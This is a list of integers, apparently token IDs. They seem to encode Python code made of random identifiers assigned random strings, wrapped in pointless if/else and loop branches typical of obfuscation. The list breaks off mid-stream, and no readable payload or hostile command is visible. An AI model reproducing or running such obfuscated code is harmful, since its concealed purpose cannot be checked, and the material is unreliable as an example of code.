10872,
49,
80,
35,
11230,
70,
16768,
38,
73,
35,
57,
38202,
38,
48,
68,
6836,
81,
89,
48192,
83,
57,
796,
705,
49,
81,
54,
559,
46559,
12303,
80,
21870,
5258,
75,
3041,
844,
85,
46,
6500,
81,
50,
89,
48,
86,
35,
22877,
39,
14542,
52,
88,
34970,
80,
87,
38841,
73,
19499,
67,
5246,
39,
76,
23155,
35,
85,
87,
49,
48,
89,
36,
69,
38,
48,
45,
6,
198,
361,
267,
80,
1268,
33,
85,
2749,
84,
80,
57,
2389,
29567,
77,
23266,
50,
7378,
79,
37,
6500,
80,
25922,
89,
33863,
48,
5662,
4246,
20760,
50,
8924,
85,
28747,
37,
2127,
14082,
40469,
48,
81,
73,
4760,
21283,
5574,
38202,
86,
6624,
402,
67,
85,
55,
69,
40,
1837,
55,
49345,
33018,
23852,
5606,
5222,
37,
69,
55,
87,
89,
83,
34,
80,
10227,
14529,
2389,
53,
73,
74,
2257,
54,
29551,
38,
37882,
87,
21095,
79,
1546,
75,
1921,
47503,
7836,
46,
273,
73,
49,
81,
25,
198,
220,
220,
220,
266,
82,
55,
27891,
33866,
39,
73,
4653,
9419,
82,
39,
85,
37,
5064,
77,
7355,
85,
40,
10277,
49,
87,
21414,
43,
10547,
38,
9598,
10872,
49,
80,
35,
11230,
70,
16768,
38,
73,
35,
57,
38202,
38,
48,
68,
6836,
81,
89,
48192,
83,
57,
796,
705,
49,
81,
54,
559,
46559,
12303,
80,
21870,
5258,
75,
3041,
844,
85,
46,
6500,
81,
50,
89,
48,
86,
35,
22877,
39,
14542,
52,
88,
34970,
80,
87,
38841,
73,
19499,
67,
5246,
39,
76,
23155,
35,
85,
87,
49,
48,
89,
36,
69,
38,
48,
45,
6,
198,
220,
220,
220,
266,
82,
55,
27891,
33866,
39,
73,
4653,
9419,
82,
39,
85,
37,
5064,
77,
7355,
85,
40,
10277,
49,
87,
21414,
43,
10547,
38,
9598,
10872,
49,
80,
35,
11230,
70,
16768,
38,
73,
35,
57,
38202,
38,
48,
68,
6836,
81,
89,
48192,
83,
57,
796,
267,
80,
1268,
33,
85,
2749,
84,
80,
57,
2389,
29567,
77,
23266,
50,
7378,
79,
37,
6500,
80,
25922,
89,
33863,
48,
5662,
4246,
20760,
50,
8924,
85,
28747,
37,
2127,
14082,
40469,
48,
81,
73,
4760,
21283,
5574,
38202,
86,
198,
17772,
25,
198,
220,
220,
220,
266,
82,
55,
27891,
33866,
39,
73,
4653,
9419,
82,
39,
85,
37,
5064,
77,
7355,
85,
40,
10277,
49,
87,
21414,
43,
10547,
38,
9598,
10872,
49,
80,
35,
11230,
70,
16768,
38,
73,
35,
57,
38202,
38,
48,
68,
6836,
81,
89,
48192,
83,
57,
796,
705,
49,
81,
54,
559,
46559,
12303,
80,
21870,
5258,
75,
3041,
844,
85,
46,
6500,
81,
50,
89,
48,
86,
35,
22877,
39,
14542,
52,
88,
34970,
80,
87,
38841,
73,
19499,
67,
5246,
39,
76,
23155,
35,
85,
87,
49,
48,
89,
36,
69,
38,
48,
45,
6,
198,
220,
220,
220,
266,
82,
55,
27891,
33866,
39,
73,
4653,
9419,
82,
39,
85,
37,
5064,
77,
7355,
85,
40,
10277,
49,
87,
21414,
43,
10547,
38,
9598,
10872,
49,
80,
35,
11230,
70,
16768,
38,
73,
35,
57,
38202,
38,
48,
68,
6836,
81,
89,
48192,
83,
57,
796,
705,
21095,
86,
14313,
1921,
11571,
2749,
89,
41,
48,
622,
23264,
7792,
80,
69,
80,
50110,
38,
48,
69,
49,
349,
84,
3118,
26708,
45,
76,
38,
77,
7730,
4462,
36,
4593,
81,
46,
85,
49,
76,
27912,
64,
1273,
86,
85,
7397,
38729,
6,
198,
28311,
25,
198,
220,
220,
220,
334,
36,
1546,
34,
46569,
20519,
50,
89,
82,
1137,
14082,
85,
41,
87,
36540,
4663,
45,
70,
53,
3666,
83,
4061,
34,
33018,
54,
41,
14082,
2885,
1268,
49,
48,
16768,
86,
89,
56,
11674,
7399,
2969,
88,
40,
88,
33,
76,
36,
80,
41,
796,
705,
31554,
36802,
1505,
48,
8579,
39,
38,
70,
18564,
7250,
15285,
4503,
54,
4561,
89,
41,
39,
3705,
37,
22877,
47,
41,
32754,
20471,
18833,
44,
57,
1137,
70,
34382,
2290,
84,
40,
7670,
88,
10161,
49,
30386,
9908,
20866,
6,
198,
220,
220,
220,
410,
49,
15996,
4352,
85,
8697,
45579,
5662,
41,
18227,
89,
51,
80,
48,
88,
21217,
43221,
55,
40469,
5247,
47,
56,
81,
42012,
33772,
34,
86,
7902,
69,
43021,
4462,
74,
35,
48,
34,
87,
77,
33,
85,
89,
7707,
79,
41,
56,
41,
77,
796,
705,
82,
37,
3886,
49,
76,
40,
84,
4933,
37882,
413,
56,
26145,
85,
39,
87,
77,
41,
3792,
6217,
34,
41,
36,
86,
49,
34382,
11674,
85,
1544,
80,
34,
89,
732,
89,
2538,
34,
41,
80,
538,
84,
322,
89,
13415,
45766,
45,
6173,
84,
6,
198,
220,
220,
220,
611,
334,
36,
1546,
34,
46569,
20519,
50,
89,
82,
1137,
14082,
85,
41,
87,
36540,
4663,
45,
70,
53,
3666,
83,
4061,
34,
33018,
54,
41,
14082,
2885,
1268,
49,
48,
16768,
86,
89,
56,
11674,
7399,
2969,
88,
40,
88,
33,
76,
36,
80,
41,
14512,
410,
49,
15996,
4352,
85,
8697,
45579,
5662,
41,
18227,
89,
51,
80,
48,
88,
21217,
43221,
55,
40469,
5247,
47,
56,
81,
42012,
33772,
34,
86,
7902,
69,
43021,
4462,
74,
35,
48,
34,
87,
77,
33,
85,
89,
7707,
79,
41,
56,
41,
77,
25,
198,
220,
220,
220,
220,
220,
220,
220,
334,
36,
1546,
34,
46569,
20519,
50,
89,
82,
1137,
14082,
85,
41,
87,
36540,
4663,
45,
70,
53,
3666,
83,
4061,
34,
33018,
54,
41,
14082,
2885,
1268,
49,
48,
16768,
86,
89,
56,
11674,
7399,
2969,
88,
40,
88,
33,
76,
36,
80,
41,
796,
705,
82,
37,
3886,
49,
76,
40,
84,
4933,
37882,
413,
56,
26145,
85,
39,
87,
77,
41,
3792,
6217,
34,
41,
36,
86,
49,
34382,
11674,
85,
1544,
80,
34,
89,
732,
89,
2538,
34,
41,
80,
538,
84,
322,
89,
13415,
45766,
45,
6173,
84,
6,
198,
220,
220,
220,
220,
220,
220,
220,
410,
49,
15996,
4352,
85,
8697,
45579,
5662,
41,
18227,
89,
51,
80,
48,
88,
21217,
43221,
55,
40469,
5247,
47,
56,
81,
42012,
33772,
34,
86,
7902,
69,
43021,
4462,
74,
35,
48,
34,
87,
77,
33,
85,
89,
7707,
79,
41,
56,
41,
77,
796,
334,
36,
1546,
34,
46569,
20519,
50,
89,
82,
1137,
14082,
85,
41,
87,
36540,
4663,
45,
70,
53,
3666,
83,
4061,
34,
33018,
54,
41,
14082,
2885,
1268,
49,
48,
16768,
86,
89,
56,
11674,
7399,
2969,
88,
40,
88,
33,
76,
36,
80,
41,
198,
220,
220,
220,
220,
220,
220,
220,
334,
36,
1546,
34,
46569,
20519,
50,
89,
82,
1137,
14082,
85,
41,
87,
36540,
4663,
45,
70,
53,
3666,
83,
4061,
34,
33018,
54,
41,
14082,
2885,
1268,
49,
48,
16768,
86,
89,
56,
11674,
7399,
2969,
88,
40,
88,
33,
76,
36,
80,
41,
796,
705,
31554,
36802,
1505,
48,
8579,
39,
38,
70,
18564,
7250,
15285,
4503,
54,
4561,
89,
41,
39,
3705,
37,
22877,
47,
41,
32754,
20471,
18833,
44,
57,
1137,
70,
34382,
2290,
84,
40,
7670,
88,
10161,
49,
30386,
9908,
20866,
6,
198,
220,
220,
220,
422,
4755,
13,
4029,
6998,
39,
77,
1581,
41,
36,
1268,
87,
33884,
380,
32,
41,
6535,
56,
6535,
46437,
3398,
39,
55,
5222,
41,
88,
38,
80,
3808,
38208,
73,
55,
41133,
22348,
88,
34,
4464,
26009,
87,
76,
33,
1360,
89,
39,
1453,
49,
1330,
334,
11584,
3886,
23741,
77,
16768,
28747,
85,
1383,
47,
3824,
77,
2389,
37,
3020,
85,
11901,
36905,
7112,
88,
20913,
87,
89,
2200,
4805,
23852,
48,
2385,
39,
4339,
9865,
11770,
83,
33,
48,
85,
40,
2528,
7708,
11,
6226,
84,
701,
34,
24723,
81,
33,
76,
4720,
16045,
38,
79,
49044,
45,
1503,
4720,
1837,
2821,
74,
44175,
5258,
9414,
50,
87,
38,
380,
50,
57,
46,
1503,
39,
4177,
2885,
87,
36287,
44602,
5837,
70,
46,
70,
37,
25297,
11,
410,
83,
13599,
85,
45,
14887,
43,
48,
73,
88,
41,
77,
35504,
2662,
2246,
10305,
35,
86,
7397,
50,
49044,
42955,
46,
72,
38715,
11015,
8847,
45,
3705,
84,
80,
7707,
82,
41,
39,
7571,
15200,
1026,
10913,
80,
86,
198,
220,
220,
220,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
796,
705,
36227,
43833,
89,
27654,
15571,
35906,
79,
46,
40,
21217,
34586,
17511,
85,
48,
87,
35,
37280,
49,
86,
8141,
20942,
10913,
16045,
79,
3919,
16045,
89,
35,
4579,
38,
41,
5258,
49,
32178,
15548,
1026,
48,
14304,
11901,
20306,
6,
198,
220,
220,
220,
25812,
84,
55,
83,
6998,
44,
5258,
81,
41582,
86,
13916,
35,
86,
41275,
45579,
80,
37686,
41,
39,
20760,
23127,
2953,
33,
7397,
37,
15916,
79,
34,
4834,
46,
84,
34,
1462,
42598,
23160,
2640,
14242,
32,
41,
23548,
53,
71,
37,
796,
705,
66,
87,
10008,
4760,
77,
15922,
56,
37,
13807,
34,
89,
17602,
45,
71,
53,
43812,
21768,
9936,
34,
3163,
45,
79,
10277,
31554,
85,
381,
34,
48,
40,
87,
2943,
47,
41,
20120,
2396,
89,
45,
7112,
45895,
1581,
88,
56,
37,
87,
36,
6,
198,
220,
220,
220,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
796,
705,
83,
11584,
52,
73,
32,
37304,
85,
22184,
7390,
622,
55,
39,
1565,
85,
50,
44817,
70,
660,
8610,
2149,
4792,
38,
3978,
68,
47,
3886,
35,
17184,
18227,
23548,
74,
4851,
45,
431,
10761,
35028,
88,
46,
72,
9598,
33,
6,
198,
220,
220,
220,
279,
16960,
74,
45,
89,
10744,
21217,
46265,
57,
80,
6500,
26001,
70,
5064,
893,
37,
73,
47247,
80,
88,
38475,
305,
3620,
87,
45,
10227,
41275,
3838,
10277,
34,
70,
7902,
35,
1722,
34382,
301,
41,
11584,
78,
7556,
89,
796,
705,
80,
38,
73,
50,
89,
43,
76,
1360,
78,
48382,
1137,
88,
41736,
69,
55,
75,
80,
3856,
16960,
4221,
57,
48,
39,
70,
13940,
13940,
12562,
45113,
76,
45,
88,
43,
79,
40,
39,
6322,
56,
46,
76,
48,
5606,
11401,
40,
2749,
89,
79,
86,
6,
198,
220,
220,
220,
449,
57,
46456,
47,
3978,
70,
74,
41,
86,
2725,
22778,
41,
48,
43538,
7998,
67,
32274,
41,
37,
89,
79,
48,
42372,
47,
3483,
75,
39,
74,
48,
4061,
41,
57,
31554,
80,
5258,
86,
89,
86,
4663,
57,
74,
30386,
57,
82,
42592,
37,
5258,
796,
705,
41,
7378,
73,
42801,
6968,
15112,
78,
4462,
33866,
37,
13396,
41,
56,
13599,
4462,
67,
38,
42372,
38022,
8579,
71,
10652,
88,
4339,
84,
49,
5222,
81,
37,
88,
35,
1026,
26001,
37,
5812,
1546,
40,
8905,
22182,
41,
76,
6,
198,
220,
220,
220,
1195,
55,
2584,
46,
10913,
84,
48,
6732,
18060,
85,
4579,
48,
40,
89,
20120,
48,
400,
46141,
18878,
87,
37,
57,
87,
21370,
38,
85,
41,
17511,
56,
1820,
32,
84,
35,
80,
12298,
20185,
48,
71,
45,
10246,
46,
57,
48,
88,
29266,
796,
705,
41,
6500,
80,
79,
35,
83,
80,
43421,
15548,
37,
89,
45,
1797,
76,
37094,
29499,
2257,
306,
55,
10305,
40,
2662,
54,
38,
48,
42413,
4663,
84,
45,
48,
82,
47,
1532,
78,
41,
11994,
1581,
37,
24142,
89,
49,
31212,
77,
39,
18504,
6,
198,
220,
220,
220,
611,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
14512,
279,
16960,
74,
45,
89,
10744,
21217,
46265,
57,
80,
6500,
26001,
70,
5064,
893,
37,
73,
47247,
80,
88,
38475,
305,
3620,
87,
45,
10227,
41275,
3838,
10277,
34,
70,
7902,
35,
1722,
34382,
301,
41,
11584,
78,
7556,
89,
25,
198,
220,
220,
220,
220,
220,
220,
220,
25812,
84,
55,
83,
6998,
44,
5258,
81,
41582,
86,
13916,
35,
86,
41275,
45579,
80,
37686,
41,
39,
20760,
23127,
2953,
33,
7397,
37,
15916,
79,
34,
4834,
46,
84,
34,
1462,
42598,
23160,
2640,
14242,
32,
41,
23548,
53,
71,
37,
796,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1195,
55,
2584,
46,
10913,
84,
48,
6732,
18060,
85,
4579,
48,
40,
89,
20120,
48,
400,
46141,
18878,
87,
37,
57,
87,
21370,
38,
85,
41,
17511,
56,
1820,
32,
84,
35,
80,
12298,
20185,
48,
71,
45,
10246,
46,
57,
48,
88,
29266,
287,
279,
16960,
74,
45,
89,
10744,
21217,
46265,
57,
80,
6500,
26001,
70,
5064,
893,
37,
73,
47247,
80,
88,
38475,
305,
3620,
87,
45,
10227,
41275,
3838,
10277,
34,
70,
7902,
35,
1722,
34382,
301,
41,
11584,
78,
7556,
89,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1195,
55,
2584,
46,
10913,
84,
48,
6732,
18060,
85,
4579,
48,
40,
89,
20120,
48,
400,
46141,
18878,
87,
37,
57,
87,
21370,
38,
85,
41,
17511,
56,
1820,
32,
84,
35,
80,
12298,
20185,
48,
71,
45,
10246,
46,
57,
48,
88,
29266,
14512,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
25812,
84,
55,
83,
6998,
44,
5258,
81,
41582,
86,
13916,
35,
86,
41275,
45579,
80,
37686,
41,
39,
20760,
23127,
2953,
33,
7397,
37,
15916,
79,
34,
4834,
46,
84,
34,
1462,
42598,
23160,
2640,
14242,
32,
41,
23548,
53,
71,
37,
796,
25812,
84,
55,
83,
6998,
44,
5258,
81,
41582,
86,
13916,
35,
86,
41275,
45579,
80,
37686,
41,
39,
20760,
23127,
2953,
33,
7397,
37,
15916,
79,
34,
4834,
46,
84,
34,
1462,
42598,
23160,
2640,
14242,
32,
41,
23548,
53,
71,
37,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
449,
57,
46456,
47,
3978,
70,
74,
41,
86,
2725,
22778,
41,
48,
43538,
7998,
67,
32274,
41,
37,
89,
79,
48,
42372,
47,
3483,
75,
39,
74,
48,
4061,
41,
57,
31554,
80,
5258,
86,
89,
86,
4663,
57,
74,
30386,
57,
82,
42592,
37,
5258,
796,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
796,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
198,
220,
220,
220,
220,
220,
220,
220,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
796,
449,
57,
46456,
47,
3978,
70,
74,
41,
86,
2725,
22778,
41,
48,
43538,
7998,
67,
32274,
41,
37,
89,
79,
48,
42372,
47,
3483,
75,
39,
74,
48,
4061,
41,
57,
31554,
80,
5258,
86,
89,
86,
4663,
57,
74,
30386,
57,
82,
42592,
37,
5258,
198,
220,
220,
220,
220,
220,
220,
220,
611,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
6624,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1195,
55,
2584,
46,
10913,
84,
48,
6732,
18060,
85,
4579,
48,
40,
89,
20120,
48,
400,
46141,
18878,
87,
37,
57,
87,
21370,
38,
85,
41,
17511,
56,
1820,
32,
84,
35,
80,
12298,
20185,
48,
71,
45,
10246,
46,
57,
48,
88,
29266,
287,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1195,
55,
2584,
46,
10913,
84,
48,
6732,
18060,
85,
4579,
48,
40,
89,
20120,
48,
400,
46141,
18878,
87,
37,
57,
87,
21370,
38,
85,
41,
17511,
56,
1820,
32,
84,
35,
80,
12298,
20185,
48,
71,
45,
10246,
46,
57,
48,
88,
29266,
6624,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
796,
42920,
41,
73,
38208,
73,
45,
86,
2885,
77,
5258,
45,
16768,
87,
75,
15766,
84,
16960,
89,
6242,
73,
88,
33,
2584,
31273,
20120,
82,
6242,
21095,
88,
33,
6981,
38,
7836,
315,
742,
74,
55,
13599,
8205,
2736,
39,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17228,
32178,
48,
73,
21479,
54,
38,
86,
39,
45,
81,
57,
8416,
72,
57,
83,
41,
39,
79,
46,
83,
7801,
74,
54,
48,
39,
75,
5258,
85,
35,
86,
49,
87,
49044,
32,
3361,
35,
7639,
41,
3528,
5188,
74,
41,
2528,
37,
78,
37094,
69,
796,
449,
57,
46456,
47,
3978,
70,
74,
41,
86,
2725,
22778,
41,
48,
43538,
7998,
67,
32274,
41,
37,
89,
79,
48,
42372,
47,
3483,
75,
39,
74,
48,
4061,
41,
57,
31554,
80,
5258,
86,
89,
86,
4663,
57,
74,
30386,
57,
82,
42592,
37,
5258,
198,
220,
220,
220,
422,
4755,
13,
38,
11012,
84,
38,
73,
22877,
35,
83,
18429,
75,
35028,
39,
21768,
8068,
41,
39,
21870,
48,
7112,
89,
67,
11473,
80,
1581,
66,
5777,
87,
8590,
86,
21095,
85,
8610,
36077,
29567,
6322,
5064,
50,
34523,
51,
893,
81,
73,
46,
1330,
410,
4663,
86,
20304,
81,
7112,
78,
45113,
88,
26903,
39,
20895,
41,
73,
83,
45,
7156,
47,
48,
13563,
29567,
84,
32,
78,
25690,
73,
50,
85,
34278,
8141,
39,
66,
35,
38,
89,
12096,
16115,
8898,
2389,
11545,
41,
38,
9078,
11,
479,
88,
85,
2645,
89,
48,
2645,
6242,
14259,
9908,
47,
1565,
84,
32886,
41,
89,
41,
1659,
36,
7708,
27799,
3978,
72,
41,
79,
34,
1961,
49,
87,
78,
48,
45,
349,
44,
80,
39,
83,
37,
3398,
87,
13940,
4462,
81,
10652,
4093,
198,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
327,
85,
87,
4093,
72,
21713,
35,
88,
38,
7397,
46,
85,
73,
37,
41,
70,
55,
15450,
5064,
50,
41,
23577,
88,
35,
75,
89,
79,
8924,
83,
56,
75,
70,
1837,
25374,
73,
35257,
21999,
74,
11909,
88,
365,
55,
89,
47,
5796,
52,
88,
38,
796,
705,
35,
77,
48,
87,
81,
12298,
35660,
38,
77,
2767,
403,
11230,
88,
80,
3041,
47,
77,
25374,
8226,
31125,
87,
32819,
84,
53,
56,
22348,
41,
18429,
2885,
55,
83,
5064,
85,
9399,
2025,
2797,
37,
5653,
34985,
86,
39,
86,
6,
198,
220,
220,
220,
220,
220,
220,
220,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
28047,
2645,
48,
89,
16340,
796,
705,
21713,
2749,
78,
57,
33,
89,
48,
18564,
89,
38,
41,
22778,
39,
81,
80,
6998,
35,
83,
32457,
2937,
84,
7355,
17034,
48624,
41,
4579,
57,
89,
86,
3539,
37020,
47,
563,
69,
12418,
45113,
7998,
55,
83,
8898,
49345,
7501,
36,
6,
198,
220,
220,
220,
220,
220,
220,
220,
350,
2969,
4303,
76,
2885,
40,
79,
89,
79,
85,
23155,
73,
49,
87,
11012,
77,
14082,
2149,
77,
87,
48,
89,
73,
39,
4507,
37,
35904,
48,
50,
89,
39,
87,
76,
45,
88,
56,
16960,
76,
8763,
86,
40,
89,
3620,
48,
83,
37,
76,
73,
50,
55,
33,
796,
705,
39,
1581,
76,
49,
7597,
33,
7708,
78,
40,
79,
40939,
35,
70,
35,
86,
41,
54,
3546,
5258,
3398,
38475,
76,
2394,
38,
14259,
40,
306,
27912,
89,
34,
86,
4851,
70,
57,
47,
84,
3705,
35,
21638,
39,
73,
49,
13137,
81,
44802,
6,
198,
220,
220,
220,
220,
220,
220,
220,
314,
41,
85,
89,
49,
81,
12562,
75,
34,
5247,
39,
9697,
85,
49,
10659,
41,
15450,
50,
35906,
48232,
5837,
53,
2149,
7745,
89,
40,
87,
39,
41,
15418,
87,
81,
47,
48,
280,
35028,
54,
88,
49,
710,
11584,
80,
33884,
9414,
49,
796,
705,
73,
56,
20866,
74,
57,
33,
86,
50,
41,
75,
2394,
5105,
67,
49,
41126,
52,
9908,
36,
73,
36,
16768,
39,
41,
87,
84,
46,
89,
4221,
43812,
11251,
46047,
49,
76,
39,
82,
19399,
33,
10295,
81,
46,
83,
41,
12303,
34,
6968,
56,
83,
6,
198,
220,
220,
220,
220,
220,
220,
220,
26692,
39,
2436,
54,
86,
3109,
40939,
41,
42,
41,
42,
80,
12496,
28861,
2937,
42,
79,
3046,
25374,
16768,
3019,
4462,
81,
35,
2749,
44,
89,
43221,
52,
73,
45448,
31667,
84,
47,
74,
7206,
5868,
86,
48,
73,
45113,
48,
9419,
796,
705,
41,
80,
36,
86,
51,
48,
76,
85,
457,
9697,
41,
51,
2953,
80,
2953,
80,
89,
44,
3046,
38374,
12203,
41133,
37,
9865,
80,
79,
40939,
45766,
37,
3163,
86,
43,
3483,
32,
84,
50,
81,
35,
79,
48,
4507,
7745,
43,
47858,
41,
83,
6,
198,
220,
220,
220,
220,
220,
220,
220,
1475,
81,
17034,
55,
48,
76,
41,
77,
13909,
84,
32,
2937,
12889,
73,
37,
41,
69,
50,
8226,
49,
11190,
12562,
54,
88,
38,
3109,
88,
30758,
4061,
84,
41,
12303,
33,
4851,
82,
12861,
16768,
8924,
48,
49,
70,
4663,
11230,
89,
36,
796,
705,
85,
50,
73,
80,
6968,
41,
89,
55,
84,
37,
87,
47,
2943,
38,
3838,
2821,
40,
452,
53,
563,
87,
89,
76,
45,
87,
89,
82,
48,
38,
926,
47,
3727,
50,
89,
13252,
23852,
55,
3886,
47,
55,
35,
86,
35,
38,
4061,
74,
35,
38,
89,
5247,
6,
198,
220,
220,
220,
220,
220,
220,
220,
22028,
49,
37048,
41,
25983,
42,
87,
74,
52,
39,
4507,
33,
87,
48,
1797,
10227,
82,
56,
88,
5653,
85,
19238,
33,
66,
36,
48,
73,
1140,
80,
32,
7156,
17209,
1820,
32274,
15112,
3629,
3620,
2885,
88,
33,
8903,
38,
87,
35,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
35,
77,
48,
87,
81,
12298,
35660,
38,
77,
2767,
403,
11230,
88,
80,
3041,
47,
77,
25374,
8226,
31125,
87,
32819,
84,
53,
56,
22348,
41,
18429,
2885,
55,
83,
5064,
85,
9399,
2025,
2797,
37,
5653,
34985,
86,
39,
86,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
39,
1581,
76,
49,
7597,
33,
7708,
78,
40,
79,
40939,
35,
70,
35,
86,
41,
54,
3546,
5258,
3398,
38475,
76,
2394,
38,
14259,
40,
306,
27912,
89,
34,
86,
4851,
70,
57,
47,
84,
3705,
35,
21638,
39,
73,
49,
13137,
81,
44802,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
41,
80,
36,
86,
51,
48,
76,
85,
457,
9697,
41,
51,
2953,
80,
2953,
80,
89,
44,
3046,
38374,
12203,
41133,
37,
9865,
80,
79,
40939,
45766,
37,
3163,
86,
43,
3483,
32,
84,
50,
81,
35,
79,
48,
4507,
7745,
43,
47858,
41,
83,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
5777,
88,
16811,
544,
13252,
76,
43833,
88,
39,
20474,
37,
74,
45,
7250,
70,
49,
11909,
74,
87,
56,
41,
5188,
79,
43021,
56,
7285,
9865,
36,
83,
22778,
81,
11674,
48,
85,
36,
7355,
71,
73,
87,
48,
26001,
5258,
41,
29138,
75,
6,
198,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
329,
327,
85,
87,
4093,
72,
21713,
35,
88,
38,
7397,
46,
85,
73,
37,
41,
70,
55,
15450,
5064,
50,
41,
23577,
88,
35,
75,
89,
79,
8924,
83,
56,
75,
70,
1837,
25374,
73,
35257,
21999,
74,
11909,
88,
365,
55,
89,
47,
5796,
52,
88,
38,
287,
1475,
81,
17034,
55,
48,
76,
41,
77,
13909,
84,
32,
2937,
12889,
73,
37,
41,
69,
50,
8226,
49,
11190,
12562,
54,
88,
38,
3109,
88,
30758,
4061,
84,
41,
12303,
33,
4851,
82,
12861,
16768,
8924,
48,
49,
70,
4663,
11230,
89,
36,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
